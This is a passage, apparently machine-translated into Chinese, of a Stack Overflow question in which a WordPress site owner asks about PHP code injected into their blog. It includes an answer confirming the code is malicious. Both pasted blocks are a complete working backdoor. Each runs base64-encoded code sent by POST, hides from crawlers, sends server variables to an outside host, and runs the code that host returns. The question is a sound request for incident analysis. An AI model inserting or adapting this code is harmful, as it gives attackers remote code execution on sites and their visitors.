谷歌安全浏览最近在我们的Wordpress博客上检测到恶意软件。后来,我们发现有人成功地向我们的一些php文件注入了代码块。我正在尝试了解恶意软件,访问损坏,找出如何恢复我们的系统,以及这对受影响的用户意味着什么。
问题:
是因为Drupalgeddon- do,我们网站的一个返回用户即使在我们清理了服务器之后也会受到影响,因为这个代码设置了cookies。
对在中使用的两段代码执行操作
优先:
if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
eval(base64_decode($_POST["cookies_p"]));
}
if(strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
$patchedfv = "GHKASMVG";
}
if (isset($_REQUEST[fdgdfgvv]))
{
if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
$patchedfv = "SDFDFSDF";
}
}
if($patchedfv === "GHKASMVG")
{
@ob_end_clean();
die;
}
error_reporting(0);
if (!$kjdke_c)
{
global $kjdke_c;
$kjdke_c = 1;
global $include_test;
$include_test = 1;
$bkljg = $_SERVER["HTTP_USER_AGENT"];
$ghfju = array(
"Google",
"Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler",
"bot",
"spid",
"Lynx",
"PHP",
"WordPress" . "integromedb",
"SISTRIX",
"Aggregator",
"findlinks",
"Xenu",
"BacklinkCrawler",
"Scheduler",
"mod_pagespeed",
"Index",
"ahoo",
"Tapatalk",
"PubSub",
"RSS",
"WordPress"
);
if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
{
}
else
{
foreach($_SERVER as $ndbv => $cbcd)
{
$data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
}
$context_jhkb = stream_context_create(array(
http => array(
timeout => 15,
header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
method => POST,
content => "REM_REM=\'1\'" . $data_nfdh
)
));
$vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
if ($vkfu)
{
@eval($vkfu);
}
else
{
ob_start();
if (!@headers_sent())
{
@setcookie("condtions", "2", time() + 172800);
}
else
{
echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";
};
};
}
}
Second:
if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
eval(base64_decode($_POST["cookies_p"]));
}
if (strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
$patchedfv = "GHKASMVG";
}
if (isset($_REQUEST[fdgdfgvv]))
{
if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
$patchedfv = "SDFDFSDF";
}
}
if ($patchedfv === "GHKASMVG")
{
@ob_end_clean();
die;
}
if (strpos($_SERVER["HTTP_USER_AGENT"], "Win") === false)
{
$kjdke_c = 1;
}
error_reporting(0);
if (!$kjdke_c)
{
global $kjdke_c;
$kjdke_c = 1;
global $include_test;
$include_test = 1;
$bkljg = $_SERVER["HTTP_USER_AGENT"];
$ghfju = array(
"Google",
"Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler",
"bot",
"spid",
"Lynx",
"PHP",
"WordPress" . "integromedb",
"SISTRIX",
"Aggregator",
"findlinks",
"Xenu",
"BacklinkCrawler",
"Scheduler",
"mod_pagespeed",
"Index",
"ahoo",
"Tapatalk",
"PubSub",
"RSS",
"WordPress"
);
if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
{
}
else
{
foreach($_SERVER as $ndbv => $cbcd)
{
$data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
}
$context_jhkb = stream_context_create(array(
http => array(
timeout => 15,
header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
method => POST,
content => "REM_REM=\'1\'" . $data_nfdh
)
));
$vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
if ($vkfu)
{
@eval($vkfu);
}
else
{
ob_start();
if (!@headers_sent())
{
@setcookie("condtions", "2", time() + 172800);
}
else
{
echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";
};
};
}
}
到目前为止的结论:感谢@Alex Howansky,可以肯定这是一个恶意软件,这个point.And可能被用来执行任何类型的攻击(例如:上面的攻击或随机重定向到可疑网站).But我仍然在努力了解我们的Wordpress博客是如何感染的,以及如何防止这种情况发生
还有一件事:谷歌在我们的wordpress博客上检测到了这个恶意软件。托管在/blog上。但谷歌和其他搜索引擎将整个域名标记为恶意软件,导致用户无法访问我们托管在根域的react应用程序。整个域都被攻破了吗?我们的react应用安全吗?
发布于 2018-07-19 04:20:46
是恶意的吗?
是。这使得远程用户能够将任意代码发送到您的服务器以执行:
eval(base64_decode($_POST["cookies_p"]));
这会下载代码,然后执行它:
$vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
@eval($vkfu);
它对我们的用户做了什么?
很难说。
这似乎是一个名为Drupalgeddon的已知漏洞,它在几个月前被发现并打上了补丁。你需要保持你的安装是最新的。
https://stackoverflow.com/questions/51410327
复制相似问题